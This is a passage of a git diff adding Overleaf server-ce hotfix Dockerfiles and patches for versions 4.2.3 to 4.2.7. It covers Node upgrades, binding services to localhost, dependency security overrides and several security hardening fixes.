getRequestToken(req, projectId) { + const token = +- (req.session && +- req.session.anonTokenAccess && +- req.session.anonTokenAccess[projectId.toString()]) || +- req.headers['x-sl-anonymous-access-token'] ++ req.session && ++ req.session.anonTokenAccess && ++ req.session.anonTokenAccess[projectId.toString()] + return token + }, diff --git a/server-ce/hotfix/4.2.3/Dockerfile b/server-ce/hotfix/4.2.3/Dockerfile new file mode 100644 index 0000000..06c526d --- /dev/null +++ b/server-ce/hotfix/4.2.3/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:4.2.2 + +# Upgrade Node.js to version 18.19.1 +RUN apt-get update \ +&& apt-get install -y nodejs=18.19.1-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* diff --git a/server-ce/hotfix/4.2.4/Dockerfile b/server-ce/hotfix/4.2.4/Dockerfile new file mode 100644 index 0000000..30d3be8 --- /dev/null +++ b/server-ce/hotfix/4.2.4/Dockerfile @@ -0,0 +1,23 @@ +FROM sharelatex/sharelatex:4.2.3 + +# Upgrade Node.js to version 18.20.2 +RUN apt-get update \ +&& apt-get install -y nodejs=18.20.2-1nodesource1 \ +&& rm -rf /var/lib/apt/lists/* + +# Patch: force services to use ipv4 in server-ce container +ADD env.sh /etc/sharelatex/env.sh +COPY pr_17601-1.patch /etc/sharelatex/ +RUN cd /etc/sharelatex && patch -p0 < pr_17601-1.patch && rm pr_17601-1.patch +COPY pr_17601-2.patch /overleaf/cron/ +RUN cd /overleaf/cron && patch -p0 < pr_17601-2.patch && rm pr_17601-2.patch +COPY pr_17601-3.patch /etc/service/ +RUN cd /etc/service && patch -p0 < pr_17601-3.patch && rm pr_17601-3.patch + +# Add history utility scripts +ADD bin/* /overleaf/bin/ + +# Patch: https://github.com/overleaf/internal/pull/17885 +COPY pr_17885.patch . +RUN patch -p0 -d /etc/my_init.pre_shutdown.d < pr_17885.patch \ +&& rm pr_17885.patch diff --git a/server-ce/hotfix/4.2.4/bin/flush-history-queues b/server-ce/hotfix/4.2.4/bin/flush-history-queues new file mode 100755 index 0000000..fcfe33b --- /dev/null +++ b/server-ce/hotfix/4.2.4/bin/flush-history-queues @@ -0,0 +1,7 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +cd /overleaf/services/project-history +node scripts/flush_all.js 100000 diff --git a/server-ce/hotfix/4.2.4/bin/force-history-resyncs b/server-ce/hotfix/4.2.4/bin/force-history-resyncs new file mode 100755 index 0000000..c43b1ce --- /dev/null +++ b/server-ce/hotfix/4.2.4/bin/force-history-resyncs @@ -0,0 +1,7 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +cd /overleaf/services/project-history +node scripts/force_resync.js 1000 force diff --git a/server-ce/hotfix/4.2.4/env.sh b/server-ce/hotfix/4.2.4/env.sh new file mode 100644 index 0000000..2dee36a --- /dev/null +++ b/server-ce/hotfix/4.2.4/env.sh @@ -0,0 +1,14 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export SPELLING_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/hotfix/4.2.4/pr_17601-1.patch b/server-ce/hotfix/4.2.4/pr_17601-1.patch new file mode 100644 index 0000000..3f8c136 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-1.patch @@ -0,0 +1,31 @@ +--- settings.js ++++ settings.js +@@ -256,16 +256,16 @@ const settings = { + + apis: { + web: { +- url: 'http://localhost:3000', ++ url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, +- url: 'http://localhost:3054', ++ url: 'http://127.0.0.1:3054', + }, + v1_history: { +- url: process.env.V1_HISTORY_URL || 'http://localhost:3100/api', ++ url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( +@@ -409,7 +409,7 @@ if ( + + if (parse(process.env.OVERLEAF_IS_SERVER_PRO) === true) { + settings.bypassPercentageRollouts = true +- settings.apis.references = { url: 'http://localhost:3040' } ++ settings.apis.references = { url: 'http://127.0.0.1:3040' } + } + + // Compiler diff --git a/server-ce/hotfix/4.2.4/pr_17601-2.patch b/server-ce/hotfix/4.2.4/pr_17601-2.patch new file mode 100644 index 0000000..2322ad9 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-2.patch @@ -0,0 +1,63 @@ +--- deactivate-projects.sh ++++ deactivate-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-projects.sh ++++ delete-projects.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- delete-users.sh ++++ delete-users.sh +@@ -14,7 +14,7 @@ if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + exit 0 + fi + +-WEB_URL='http://localhost:3000' ++WEB_URL='http://127.0.0.1:3000' + + USER=$(cat /etc/container_environment/WEB_API_USER) + PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) +--- project-history-periodic-flush.sh ++++ project-history-periodic-flush.sh +@@ -7,6 +7,6 @@ echo "Flush project-history queue" + echo "--------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" +--- project-history-retry-hard.sh ++++ project-history-retry-hard.sh +@@ -7,6 +7,6 @@ echo "Retry project-history errors (hard)" + echo "-----------------------------------" + date + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" +--- project-history-retry-soft.sh ++++ project-history-retry-soft.sh +@@ -6,6 +6,6 @@ echo "-----------------------------------" + echo "Retry project-history errors (soft)" + echo "-----------------------------------" + +-PROJECT_HISTORY_URL='http://localhost:3054' ++PROJECT_HISTORY_URL='http://127.0.0.1:3054' + + curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/hotfix/4.2.4/pr_17601-3.patch b/server-ce/hotfix/4.2.4/pr_17601-3.patch new file mode 100644 index 0000000..de64af5 --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17601-3.patch @@ -0,0 +1,118 @@ +--- chat-sharelatex/run ++++ chat-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30100" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/sharelatex/chat.log 2>&1 +--- clsi-sharelatex/run ++++ clsi-sharelatex/run +@@ -15,4 +15,7 @@ if [ -e '/var/run/docker.sock' ]; then + usermod -aG dockeronhost www-data + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/sharelatex/clsi.log 2>&1 +--- contacts-sharelatex/run ++++ contacts-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30360" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/sharelatex/contacts.log 2>&1 +--- docstore-sharelatex/run ++++ docstore-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30160" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> /var/log/sharelatex/docstore.log 2>&1 +--- document-updater-sharelatex/run ++++ document-updater-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30030" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/sharelatex/document-updater.log 2>&1 +--- filestore-sharelatex/run ++++ filestore-sharelatex/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/sharelatex/filestore.log 2>&1 +--- notifications-sharelatex/run ++++ notifications-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30420" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/sharelatex/notifications.log 2>&1 +--- project-history-sharelatex/run ++++ project-history-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30540" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/sharelatex/project-history.log 2>&1 +--- real-time-sharelatex/run ++++ real-time-sharelatex/run +@@ -1,2 +1,6 @@ + #!/bin/bash ++ ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/sharelatex/real-time.log 2>&1 +--- spelling-sharelatex/run ++++ spelling-sharelatex/run +@@ -6,4 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30050" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 ++ + exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/spelling/app.js >> /var/log/sharelatex/spelling.log 2>&1 +--- web-api-sharelatex/run ++++ web-api-sharelatex/run +@@ -6,6 +6,7 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:30000" + fi + ++source /etc/sharelatex/env.sh + export LISTEN_ADDRESS=0.0.0.0 + export ENABLED_SERVICES="api" + export METRICS_APP_NAME="web-api" +--- web-sharelatex/run ++++ web-sharelatex/run +@@ -6,6 +6,8 @@ if [ "$DEBUG_NODE" == "true" ]; then + NODE_PARAMS="--inspect=0.0.0.0:40000" + fi + ++source /etc/sharelatex/env.sh ++export LISTEN_ADDRESS=127.0.0.1 + export ENABLED_SERVICES="web" + export WEB_PORT="4000" diff --git a/server-ce/hotfix/4.2.4/pr_17885.patch b/server-ce/hotfix/4.2.4/pr_17885.patch new file mode 100644 index 0000000..d9816eb --- /dev/null +++ b/server-ce/hotfix/4.2.4/pr_17885.patch @@ -0,0 +1,33 @@ +--- 00_close_site ++++ 00_close_site +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + SITE_MAINTENANCE_FILE_BAK="$SITE_MAINTENANCE_FILE.bak.shutdown" + + mv "${SITE_MAINTENANCE_FILE}" "${SITE_MAINTENANCE_FILE_BAK}" +--- 01_flush_document_updater ++++ 01_flush_document_updater +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + cd /overleaf/services/document-updater && node scripts/flush_all.js >> /var/log/sharelatex/document-updater.log 2>&1 + + EXIT_CODE="$?" +--- 02_flush_project_history ++++ 02_flush_project_history +@@ -1,5 +1,8 @@ + #!/bin/sh + ++. /etc/container_environment.sh ++. /etc/sharelatex/env.sh ++ + cd /overleaf/services/project-history && node scripts/flush_all.js >> /var/log/sharelatex/project-history.log 2>&1 + + EXIT_CODE="$?" diff --git a/server-ce/hotfix/4.2.5/Dockerfile b/server-ce/hotfix/4.2.5/Dockerfile new file mode 100644 index 0000000..b140c0d --- /dev/null +++ b/server-ce/hotfix/4.2.5/Dockerfile @@ -0,0 +1,29 @@ +FROM sharelatex/sharelatex:4.2.4 + +# apply an override to the swagger-tools package to force security updates to multer and qs +# from https://github.com/overleaf/internal/pull/18433 +COPY pr_18433.patch . +RUN patch -p1 < pr_18433.patch && rm pr_18433.patch +RUN npm install --include-workspace-root -w services/history-v1 swagger-tools@0.10.4 && rm -rf /root/.cache /root/.npm $(find /tmp/ -mindepth 1 -maxdepth 1) + +# remove google-cloud packages which are unused in server-pro have a vulnerable dependency +RUN npm uninstall -w libraries/logger @google-cloud/logging-bunyan +RUN npm uninstall -w libraries/metrics @google-cloud/opentelemetry-cloud-trace-exporter @google-cloud/profiler + +# the passport-twitter package has been removed from the monorepo +RUN npm uninstall -w services/web passport-twitter + +# remove the unused services/web/scripts/translations directory +RUN rm -r services/web/scripts/translations + +COPY pr_18393.patch . +RUN patch -p1 < pr_18393.patch && rm pr_18393.patch +COPY pr_18444.patch . +RUN patch -p1 < pr_18444.patch && rm pr_18444.patch +COPY pr_18819.patch . +RUN patch -p1 < pr_18819.patch && rm pr_18819.patch +COPY pr_18570.patch . +RUN patch -p1 < pr_18570.patch && rm pr_18570.patch + +# Recompile frontend assets +RUN node genScript compile | bash diff --git a/server-ce/hotfix/4.2.5/pr_18393.patch b/server-ce/hotfix/4.2.5/pr_18393.patch new file mode 100644 index 0000000..5af1af7 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18393.patch @@ -0,0 +1,111 @@ +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +index a0d681d9cb5..2f9a4333cd6 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/href-tooltip.tsx +@@ -17,6 +17,7 @@ import { + import { Button, ControlLabel, FormControl, FormGroup } from 'react-bootstrap' + import Icon from '../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const HrefTooltipContent: FC = () => { + const state = useCodeMirrorStateContext() +@@ -108,7 +109,7 @@ export const HrefTooltipContent: FC = () => { + className="ol-cm-command-tooltip-link" + onClick={() => { + // TODO: unescape content +- window.open(url, '_blank') ++ openURL(url) + }} + > + +diff --git a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +index c51b497de01..632d71dd031 100644 +--- a/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx ++++ b/services/web/frontend/js/features/source-editor/components/command-tooltip/url-tooltip.tsx +@@ -9,6 +9,7 @@ import { + } from '../../lezer-latex/latex.terms.mjs' + import Icon from '../../../../shared/components/icon' + import { EditorState } from '@codemirror/state' ++import { openURL } from '@/features/source-editor/utils/url' + + export const UrlTooltipContent: FC = () => { + const { t } = useTranslation() +@@ -23,7 +24,7 @@ export const UrlTooltipContent: FC = () => { + onClick={() => { + const url = readUrl(state) + if (url) { +- window.open(url, '_blank') ++ openURL(url) + } + }} + > +diff --git a/services/web/frontend/js/features/source-editor/utils/url.ts b/services/web/frontend/js/features/source-editor/utils/url.ts +new file mode 100644 +index 00000000000..8bfc9bdeab8 +--- /dev/null ++++ b/services/web/frontend/js/features/source-editor/utils/url.ts +@@ -0,0 +1,11 @@ ++const ALLOWED_PROTOCOLS = ['https:', 'http:'] ++ ++export const openURL = (content: string) => { ++ const url = new URL(content, document.location.href) ++ ++ if (!ALLOWED_PROTOCOLS.includes(url.protocol)) { ++ throw new Error(`Not opening URL with protocol ${url.protocol}`) ++ } ++ ++ window.open(url, '_blank') ++} +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +index 837f90a64ab..d46b522a116 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-command-tooltip.spec.tsx +@@ -54,8 +54,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + +@@ -112,8 +112,8 @@ describe(' command tooltip in Visual mode', function () { + // open the link + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@window-open').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) +diff --git a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +index c6e28f9eeeb..106a80ba187 100644 +--- a/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx ++++ b/services/web/test/frontend/features/source-editor/components/codemirror-editor-visual-tooltips.spec.tsx +@@ -42,8 +42,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com/foo', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/foo'), + '_blank' + ) + cy.findByRole('button', { name: 'Remove link' }).click() +@@ -62,8 +62,8 @@ describe(' tooltips in Visual mode', function () { + }) + cy.findByRole('button', { name: 'Go to page' }).click() + cy.get('@open-window').should( +- 'have.been.calledOnceWithExactly', +- 'https://example.com', ++ 'have.been.calledWithMatch', ++ Cypress.sinon.match.has('href', 'https://example.com/'), + '_blank' + ) + }) diff --git a/server-ce/hotfix/4.2.5/pr_18433.patch b/server-ce/hotfix/4.2.5/pr_18433.patch new file mode 100644 index 0000000..1e14f23 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18433.patch @@ -0,0 +1,63 @@ +diff --git a/package-lock.json b/package-lock.json +index b9eba6086b..bb1a5cebaf 100644 +--- a/package-lock.json ++++ b/package-lock.json +@@ -70674,8 +70674,7 @@ + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "multer": { +- "version": "1.4.4", +- "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", ++ "version": "https://registry.npmjs.org/multer/-/multer-1.4.4.tgz", + "integrity": "sha512-2wY2+xD4udX612aMqMcB8Ws2Voq6NIUPEtD1be6m411T4uDH/VtL9i//xvcyFlTVfRdaBsk7hV5tgrGQqhuBiw==", + "requires": { + "append-field": "^1.0.0", +@@ -76995,10 +76994,10 @@ + "js-yaml": "^3.3.1", + "json-refs": "^3.0.2", + "lodash": "^4.17.4", +- "multer": "^1.1.0", ++ "multer": "1.4.5-lts.1", + "parseurl": "^1.3.0", + "path-to-regexp": "^2.0.0", +- "qs": "^6.0.3", ++ "qs": "6.5.3", + "serve-static": "^1.10.0", + "spark-md5": "^3.0.0", + "superagent": "^3.5.2", +@@ -77035,7 +77034,7 @@ + "http-errors": "~1.6.2", + "iconv-lite": "0.4.19", + "on-finished": "~2.3.0", +- "qs": "6.5.1", ++ "qs": "6.5.3", + "raw-body": "2.3.2", + "type-is": "~1.6.15" + }, +@@ -77109,8 +77108,7 @@ + "integrity": "sha512-G6zHoVqC6GGTQkZwF4lkuEyMbVOjoBKAEybQUypI1WTkqinCOrq2x6U2+phkJ1XsEMTy4LjtwPI7HW+NVrRR2w==" + }, + "qs": { +- "version": "6.5.1", +- "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", ++ "version": "https://registry.npmjs.org/qs/-/qs-6.5.1.tgz", + "integrity": "sha512-eRzhrN1WSINYCDCbrz796z37LOe3m5tmW7RQf6oBntukAG1nmovJvhnwHHRMAfeoItc1m2Hk02WER2aQ/iqs+A==" + }, + "raw-body": { +diff --git a/package.json b/package.json +index f092472caf..329d4fc5ce 100644 +--- a/package.json ++++ b/package.json +@@ -1,6 +1,12 @@ + { + "name": "overleaf", + "private": true, ++ "overrides": { ++ "swagger-tools": { ++ "multer": "1.4.5-lts.1", ++ "qs": "6.5.3" ++ } ++ }, + "dependencies": { + "patch-package": "^8.0.0" + }, diff --git a/server-ce/hotfix/4.2.5/pr_18444.patch b/server-ce/hotfix/4.2.5/pr_18444.patch new file mode 100644 index 0000000..e79fe18 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18444.patch @@ -0,0 +1,41 @@ +diff --git a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +index 4d3b80bb9a2..3efc61a2199 100644 +--- a/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx ++++ b/services/web/frontend/js/features/file-view/components/file-view-pdf.tsx +@@ -33,7 +33,10 @@ const FileViewPdf: FC<{ + return + } + +- const pdf = await PDFJS.getDocument(preview.url).promise ++ const pdf = await PDFJS.getDocument({ ++ url: preview.url, ++ isEvalSupported: false, ++ }).promise + + // bail out if loading the PDF took too long + if (!mountedRef.current) { +diff --git a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +index 9b419b1397f..6a92630a215 100644 +--- a/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js ++++ b/services/web/frontend/js/features/pdf-preview/util/pdf-js-wrapper.js +@@ -96,6 +96,7 @@ export default class PDFJSWrapper { + rangeChunkSize, + disableAutoFetch: true, + disableStream, ++ isEvalSupported: false, + textLayerMode: 2, // PDFJSViewer.TextLayerMode.ENABLE, + range: rangeTransport, + }) +diff --git a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +index 7321f9e02b5..f6c744aaec2 100644 +--- a/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts ++++ b/services/web/frontend/js/features/source-editor/extensions/visual/visual-widgets/graphics.ts +@@ -143,7 +143,7 @@ export class GraphicsWidget extends WidgetType { + return + } + +- const pdf = await PDFJS.getDocument(url).promise ++ const pdf = await PDFJS.getDocument({ url, isEvalSupported: false }).promise + const page = await pdf.getPage(1) + + // bail out if loading the PDF took too long diff --git a/server-ce/hotfix/4.2.5/pr_18570.patch b/server-ce/hotfix/4.2.5/pr_18570.patch new file mode 100644 index 0000000..05bc9f5 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18570.patch @@ -0,0 +1,30 @@ +--- a/genScript.js ++++ b/genScript.js +@@ -5,16 +5,26 @@ console.log('set -ex') + + switch (process.argv.pop()) { + case 'install': +- console.log('npm ci') ++ console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': ++ // Avoid downloading of cypress ++ console.log('export CYPRESS_INSTALL_BINARY=0') ++ ++ // install webpack and frontend dependencies ++ console.log('npm install --include=dev') ++ // install misplaced dependencies (fixed via 18389) ++ console.log('pushd ../../ && npm install --include=dev --workspaces=false && popd') ++ // run webpack + console.log('npm run webpack:production') + // drop webpack/babel cache + console.log('rm -rf node_modules/.cache') ++ // uninstall webpack and frontend dependencies ++ console.log('pushd ../../ && npm install --omit=dev && popd') + break + default: + console.log(`echo ${service.name} does not require a compilation`) diff --git a/server-ce/hotfix/4.2.5/pr_18819.patch b/server-ce/hotfix/4.2.5/pr_18819.patch new file mode 100644 index 0000000..858c044 --- /dev/null +++ b/server-ce/hotfix/4.2.5/pr_18819.patch @@ -0,0 +1,17 @@ +--- a/services/web/frontend/js/features/mathjax/load-mathjax.ts ++++ b/services/web/frontend/js/features/mathjax/load-mathjax.ts +@@ -36,6 +36,15 @@ export const loadMathJax = async () => { + }, + startup: { + typeset: false, ++ ready() { ++ window.MathJax.startup.defaultReady() ++ const safe = window.MathJax.startup.document.safe ++ safe.filterAttributes.set('fontfamily', 'filterFontFamily') ++ safe.filterMethods.filterFontFamily = ( ++ _safe: any, ++ family: string ++ ) => family.split(/;/)[0] ++ }, + }, + } diff --git a/server-ce/hotfix/4.2.6/Dockerfile b/server-ce/hotfix/4.2.6/Dockerfile new file mode 100644 index 0000000..87c3853 --- /dev/null +++ b/server-ce/hotfix/4.2.6/Dockerfile @@ -0,0 +1,3 @@ +FROM sharelatex/sharelatex:4.2.5 + +# Server Pro only hotfix diff --git a/server-ce/hotfix/4.2.7/Dockerfile b/server-ce/hotfix/4.2.7/Dockerfile new file mode 100644 index 0000000..088bd4d --- /dev/null +++ b/server-ce/hotfix/4.2.7/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:4.2.6 + +COPY pr_19293.patch . +RUN patch -p1 < pr_19293.patch && rm pr_19293.patch + +COPY pr_19296.patch . +RUN patch -p1 < pr_19296.patch && rm pr_19296.patch + +COPY pr_19297.patch . +RUN patch -p1 < pr_19297.patch && rm pr_19297.patch + +COPY pr_19071.patch . +RUN patch -p1 < pr_19071.patch && rm pr_19071.patch diff --git a/server-ce/hotfix/4.2.7/pr_19071.patch b/server-ce/hotfix/4.2.7/pr_19071.patch new file mode 100644 index 0000000..2e925e8 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19071.patch @@ -0,0 +1,37 @@ +--- a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js ++++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.js +@@ -7,13 +7,16 @@ const UserGetter = require('../User/UserGetter') + const ProjectGetter = require('../Project/ProjectGetter') + const Crypto = require('crypto') + const NotificationsBuilder = require('../Notifications/NotificationsBuilder') ++const _ = require('lodash') + + const randomBytes = promisify(Crypto.randomBytes) + + const CollaboratorsInviteHandler = { + async getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') +- const invites = await ProjectInvite.find({ projectId }).exec() ++ const invites = await ProjectInvite.find({ projectId }) ++ .select('_id email sendingUserId projectId privileges createdAt expires') ++ .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' +@@ -101,7 +104,15 @@ const CollaboratorsInviteHandler = { + logger.err({ err, projectId, email }, 'error sending messages for invite') + }) + +- return invite ++ return _.pick(invite.toObject(), [ ++ 'email', ++ 'sendingUserId', ++ 'projectId', ++ 'privileges', ++ '_id', ++ 'createdAt', ++ 'expires', ++ ]) + }, + + async revokeInvite(projectId, inviteId) { diff --git a/server-ce/hotfix/4.2.7/pr_19293.patch b/server-ce/hotfix/4.2.7/pr_19293.patch new file mode 100644 index 0000000..3a9c7d0 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19293.patch @@ -0,0 +1,17 @@ +--- a/services/clsi/app/js/StaticServerForbidSymlinks.js ++++ b/services/clsi/app/js/StaticServerForbidSymlinks.js +@@ -25,9 +25,13 @@ module.exports = ForbidSymlinks = function (staticFn, root, options) { + let file, projectId, result + const path = req.url + // check that the path is of the form /project_id_or_name/path/to/file.log +- if ((result = path.match(/^\/?([a-zA-Z0-9_-]+)\/(.*)/))) { ++ if ((result = path.match(/^\/([a-zA-Z0-9_-]+)\/(.*)$/s))) { + projectId = result[1] + file = result[2] ++ if (path !== `/${projectId}/${file}`) { ++ logger.warn({ path }, 'unrecognized file request') ++ return res.sendStatus(404) ++ } + } else { + logger.warn({ path }, 'unrecognized file request') + return res.sendStatus(404) diff --git a/server-ce/hotfix/4.2.7/pr_19296.patch b/server-ce/hotfix/4.2.7/pr_19296.patch new file mode 100644 index 0000000..578c488 --- /dev/null +++ b/server-ce/hotfix/4.2.7/pr_19296.patch @@ -0,0 +1,22 @@ +--- a/services/clsi/app/js/LatexRunner.js ++++ b/services/clsi/app/js/LatexRunner.js +@@ -110,11 +110,14 @@ function _writeLogOutput(projectId, directory, output, callback) { + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { +- 